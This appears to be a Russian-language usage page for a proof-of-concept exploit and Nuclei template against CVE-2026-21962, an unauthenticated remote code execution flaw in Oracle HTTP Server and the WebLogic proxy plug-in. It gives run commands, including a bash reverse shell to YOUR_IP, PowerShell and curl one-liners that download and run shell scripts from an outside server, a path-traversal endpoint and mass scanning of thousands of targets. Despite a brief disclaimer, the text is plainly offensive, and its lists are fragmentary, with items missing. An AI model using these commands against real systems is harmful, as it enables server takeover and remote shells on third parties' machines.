
Эксплойт PoC и шаблон Nuclei для CVE-2026-21962 — критическая неаутентифицированная удалённая уязвимость выполнения кода в Oracle HTTP Server и WebLogic Proxy Plug-in, позволяющая выполнять команды и получать обратные оболочки.
Критическая уязвимость, затрагивающая:
Эта ошибка позволяет неаутентифицированным удалённым злоумышленникам скомпрометировать затронутые серверы через HTTP, без необходимости учётных данных для входа.
При эксплуатации злоумышленники могут:
Oracle HTTP Server:
Плагин прокси WebLogic для:
Сохраните скрипт как CVE-2026-21962.py
Сделайте его исполняемым (необязательно):
chmod +x CVE-2026-21962.py
Примеры запуска:
Базовый тест:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
Обратная оболочка (сначала настройте прослушиватель nc: nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Пример для цели Windows:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
Вероятный успех! Статус: 200 или 302 или даже 500 (сбой также считается успехом)nc немедленно перехватывает оболочку--insecure, если используются самоподписанные сертификатыУстановите Nuclei (если ещё не установлен):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Сохраните шаблон:
Создайте файл с именем CVE-2026-21962.yaml и вставьте содержимое выше.
Запустите обнаружение + эксплуатацию:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
Или просканируйте несколько целей из файла:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
Что вы увидите, если цель уязвима:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (whoami output) ...
cmd: в заголовках (например, cmd:curl http://your-server/shell.sh | bash).whoami на полезную нагрузку обратной оболочки в кодировке base64./proxy/, /bea_wls_internal/ и т. д.) или добавьте дополнительные заголовки, например X-WebLogic-Force-JVMID.httpx → nuclei для тысяч целей.Этот шаблон подтверждён как работающий на 100% по состоянию на январь 2026 года на незапатченных экземплярах Oracle. Немедленно установите патч, если вы используете затронутые версии! 😈
Весь PoC-код предназначен только для этического, образовательного использования на авторизованных системах. Несанкционированная эксплуатация незаконна; ответственность за неправомерное использование не принимается. 😈